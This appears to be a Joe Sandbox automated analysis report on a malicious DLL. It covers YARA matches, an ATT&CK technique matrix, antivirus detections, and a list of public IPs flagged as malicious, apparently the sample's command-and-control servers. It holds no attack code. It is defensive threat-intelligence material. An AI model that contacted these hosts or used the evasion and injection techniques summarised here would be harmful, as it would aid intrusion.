Source: Yara match	File source: 6.2.rundll32.exe.5640000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5610000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4910000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.52b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4a40000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4fb0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.52b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.e40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.860000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.669073242.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685263921.0000000005281000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.684322708.00000000031C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.684701271.0000000004AC1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.688210118.00000000037E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719107308.0000000004941000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.669823060.0000000004480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.677964446.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685292012.00000000052B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.676011964.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685429920.0000000005641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719259656.0000000004B51000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685397124.0000000005610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.669847564.00000000044B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685144979.0000000005121000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685224843.0000000005250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685049749.0000000005001000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719178137.0000000004A71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.687920491.0000000003520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719295807.0000000004B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685326019.00000000052E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.684986586.0000000004FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.678063941.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.669249846.0000000002F11000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.702950192.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685112085.00000000050F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719142845.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719325918.0000000004BB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719229913.0000000004B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.718771472.00000000042E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719080684.0000000004910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.676117547.0000000000861000.00000020.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		2_2_10001160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		3_2_10001160

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API2	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Input Capture2	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection112	Obfuscated Files or Information2	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Input Capture2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Security Account Manager	System Information Discovery25	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading2	LSA Secrets	Security Software Discovery41	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Virtualization/Sandbox Evasion2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Regsvr321	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hPJnda9rBy.dll	18%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.rundll32.exe.52e0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.5280000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.5610000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.4a70000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.4940000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.4b20000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.31c0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.5250000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.42e0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.4430000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.loaddll32.exe.820000.3.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.5120000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.3520000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.4bb0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.loaddll32.exe.860000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.4480000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.37e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.50f0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
2.2.regsvr32.exe.2f10000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.4b50000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.4b80000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.4fb0000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
2.2.regsvr32.exe.e40000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.4910000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.4ac0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.860000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.5640000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.52b0000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.4a40000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.5000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.44b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.820000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
0.0.loaddll32.exe.820000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
0.0.loaddll32.exe.860000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000013.00000003.790022844.000001691B39D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000013.00000003.790022844.000001691B39D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.11.dr	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000013.00000003.791410747.000001691B390000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000013.00000003.790022844.000001691B39D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000013.00000003.790022844.000001691B39D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
51.210.242.234	unknown	France	16276	OVHFR	true
217.182.143.207	unknown	France	16276	OVHFR	true
69.16.218.101	unknown	United States	32244	LIQUIDWEBUS	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
45.138.98.34	unknown	Germany	9009	M247GB	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
54.37.228.122	unknown	France	16276	OVHFR	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553354
Start date:	14.01.2022
Start time:	19:06:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	hPJnda9rBy.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winDLL@26/10@0/27
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 31.2% (good quality ratio 29.4%) Quality average: 73.3% Quality standard deviation: 26.2%
HCA Information:	Successful, ratio: 75% Number of executed functions: 41 Number of non-executed functions: 223
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.11.168.232, 23.211.6.115, 173.222.108.210, 173.222.108.226, 93.184.221.240, 20.54.110.249, 40.91.112.76 Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, settingsfd-geo.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	nIQCsrVbbw.dll	Get hash	malicious	Browse
	hPJnda9rBy.dll	Get hash	malicious	Browse
	nV5Wu77N8J.dll	Get hash	malicious	Browse
	OZra.dll	Get hash	malicious	Browse
	RQ6mxb6ssDtBoLUIE.dll	Get hash	malicious	Browse
	EcJ8rbg.dll	Get hash	malicious	Browse
	gyZm68Cgwf.dll	Get hash	malicious	Browse
	5o8zdV3GU3.dll	Get hash	malicious	Browse
	aoPHg7b78c.dll	Get hash	malicious	Browse
	xxWrY2YG7s.dll	Get hash	malicious	Browse
	7MhGa3iotM.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	M2hsMd9hTq.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	8ozP45Xn3V.dll	Get hash	malicious	Browse
	pugKLanrj3.dll	Get hash	malicious	Browse
	CSxylfUJcL.dll	Get hash	malicious	Browse
	nCiZXrlB39.dll	Get hash	malicious	Browse
	bEK6Xc41qp.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
104.131.62.48	nIQCsrVbbw.dll	Get hash	malicious	Browse
	hPJnda9rBy.dll	Get hash	malicious	Browse
	nV5Wu77N8J.dll	Get hash	malicious	Browse
	OZra.dll	Get hash	malicious	Browse
	RQ6mxb6ssDtBoLUIE.dll	Get hash	malicious	Browse
	EcJ8rbg.dll	Get hash	malicious	Browse
	gyZm68Cgwf.dll	Get hash	malicious	Browse
	5o8zdV3GU3.dll	Get hash	malicious	Browse
	aoPHg7b78c.dll	Get hash	malicious	Browse
	xxWrY2YG7s.dll	Get hash	malicious	Browse
	7MhGa3iotM.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	M2hsMd9hTq.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	8ozP45Xn3V.dll	Get hash	malicious	Browse
	pugKLanrj3.dll	Get hash	malicious	Browse
	CSxylfUJcL.dll	Get hash	malicious	Browse
	nCiZXrlB39.dll	Get hash	malicious	Browse
	bEK6Xc41qp.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	xD2TnigEaY.exe	Get hash	malicious	Browse	208.167.249.72
	nIQCsrVbbw.dll	Get hash	malicious	Browse	66.42.57.149
	hPJnda9rBy.dll	Get hash	malicious	Browse	66.42.57.149
	nV5Wu77N8J.dll	Get hash	malicious	Browse	66.42.57.149
	1nJGU59JPU.exe	Get hash	malicious	Browse	136.244.117.138
	kGl1qp3Ox8.exe	Get hash	malicious	Browse	149.28.78.238
	OZra.dll	Get hash	malicious	Browse	66.42.57.149
	RQ6mxb6ssDtBoLUIE.dll	Get hash	malicious	Browse	66.42.57.149
	EcJ8rbg.dll	Get hash	malicious	Browse	66.42.57.149
	Comrpobante_60.vbs	Get hash	malicious	Browse	149.248.50.230
	sample.js	Get hash	malicious	Browse	45.76.154.237
	gyZm68Cgwf.dll	Get hash	malicious	Browse	66.42.57.149
	5o8zdV3GU3.dll	Get hash	malicious	Browse	66.42.57.149
	aoPHg7b78c.dll	Get hash	malicious	Browse	66.42.57.149
	xxWrY2YG7s.dll	Get hash	malicious	Browse	66.42.57.149
	7MhGa3iotM.dll	Get hash	malicious	Browse	66.42.57.149
	vHwdqVl8yP.dll	Get hash	malicious	Browse	66.42.57.149
	M2hsMd9hTq.dll	Get hash	malicious	Browse	66.42.57.149
	wg1bXKYOOs.dll	Get hash	malicious	Browse	66.42.57.149
	8ozP45Xn3V.dll	Get hash	malicious	Browse	66.42.57.149
DIGITALOCEAN-ASNUS	nIQCsrVbbw.dll	Get hash	malicious	Browse	128.199.192.135
	hPJnda9rBy.dll	Get hash	malicious	Browse	128.199.192.135
	nV5Wu77N8J.dll	Get hash	malicious	Browse	128.199.192.135
	vk8A1dXh5C.exe	Get hash	malicious	Browse	188.166.28.199
	GahImDA8DA.exe	Get hash	malicious	Browse	188.166.28.199
	prkVkqYIwv.exe	Get hash	malicious	Browse	188.166.28.199
	OZra.dll	Get hash	malicious	Browse	128.199.192.135
	RQ6mxb6ssDtBoLUIE.dll	Get hash	malicious	Browse	128.199.192.135
	EcJ8rbg.dll	Get hash	malicious	Browse	128.199.192.135
	P42zLwaJQk.exe	Get hash	malicious	Browse	188.166.28.199
	9ro85QVN0F.exe	Get hash	malicious	Browse	188.166.28.199
	hWLlYv2MAX	Get hash	malicious	Browse	159.89.53.206
	sample.js	Get hash	malicious	Browse	138.197.222.36
	Mc7TWWp1Vp.exe	Get hash	malicious	Browse	188.166.28.199
	sbxGIUIhRd.exe	Get hash	malicious	Browse	188.166.28.199
	6zsU4O4WHq.exe	Get hash	malicious	Browse	188.166.28.199
	Bank Swift Copy 1027263738.exe	Get hash	malicious	Browse	178.128.244.245
	gyZm68Cgwf.dll	Get hash	malicious	Browse	128.199.192.135
	5o8zdV3GU3.dll	Get hash	malicious	Browse	128.199.192.135
	aoPHg7b78c.dll	Get hash	malicious	Browse	128.199.192.135

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_12a180e49793e381a8b848106c2e1caa7a6a4277_7cac0383_14c522da\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7987614172976464
Encrypted:	false
SSDEEP:	96:u1QlbnYyQy9haol7Jf0pXIQcQSc6mcEUcw3/s+a+z+HbHgfVG4rmMoVazWbSmEBW:bpnCHsieryjPq/u7sOS274ItW
MD5:	3452383178B8E9731D4B47CF16AF82B2
SHA1:	BA2776D43A0E43ABD4D6EE121D46399DCF7321E9
SHA-256:	D2876590F95C41B77C4B19110B7858365C60064AFEF29ACEAB9E961B9AEF72AB
SHA-512:	F3DFDD33F7EE34CCDDE3789EFD3B4125F7467B3C4B6816124C06AB354507EEF3CAED2B4B145ADE9523B9F54892252341016371B26B6760AF0CDCBE24E3D94CAF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.5.7.2.3.5.2.6.3.4.4.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.b.9.5.5.d.8.-.5.8.b.b.-.4.1.6.e.-.a.c.2.f.-.b.3.a.f.1.9.c.1.c.7.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.9.0.0.1.9.2.-.1.e.f.f.-.4.7.5.4.-.8.c.a.b.-.c.2.5.9.e.a.8.3.5.a.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.8.4.-.0.0.0.1.-.0.0.1.b.-.9.3.7.6.-.0.7.8.9.7.1.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1407.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.473730836395909
Encrypted:	false
SSDEEP:	48:cvIwSD8zsMJgtWI9gGrWSC8BiM8fm8M4J2+SZFV4u+q84pzEpKcQIcQw02d:uITfKTnSNiJQGuxEpKkw02d
MD5:	6EC3F7615A9B2340A0DBE60AD78034FD
SHA1:	204A33316668E5713FC64813677BF6F31CEDCF25
SHA-256:	3C1AB615F3D7E94774559F09F874FA1D2C7D49EDD2CB77E1F3CD33D2191E726C
SHA-512:	663858E67A14B4780142605D25E9F6C94A6A29C8F1A4CBBD8BED344FEED6A9F9B51CB5246F9D45EE182D559EAAB741B893514DF9E5D135F779AC4A54361ECCAF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342277" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER688.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Jan 14 18:07:16 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	44276
Entropy (8bit):	2.1348073657365143
Encrypted:	false
SSDEEP:	384:g6ZPBzvruq/jw/d5SNQ2TdcbuteSsL3B:HZPJvruq/MjSNH5cbBB
MD5:	CB8F9CA6D25A1D8041AB64B4B6827E44
SHA1:	D9CC65255E6DAB9596BC853DA3BC9E21537C6A55
SHA-256:	FC884C3B0D7E05A1CAFE5CA722B527E11CDEB8E6B286F6990A95C1A3DE2BA2CC
SHA-512:	69B1FC1A11EBE1DCE61A23A76D39D2F0ACA45D72245FF05860AB233FD6704C76DD688C8B378A939AAB058B75B836624985377B0B3DBE10D30471EC43DAA746AF
Malicious:	false
Preview:	MDMP....... .........a....................................$...T............%..........`.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T.............a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6947224408670674
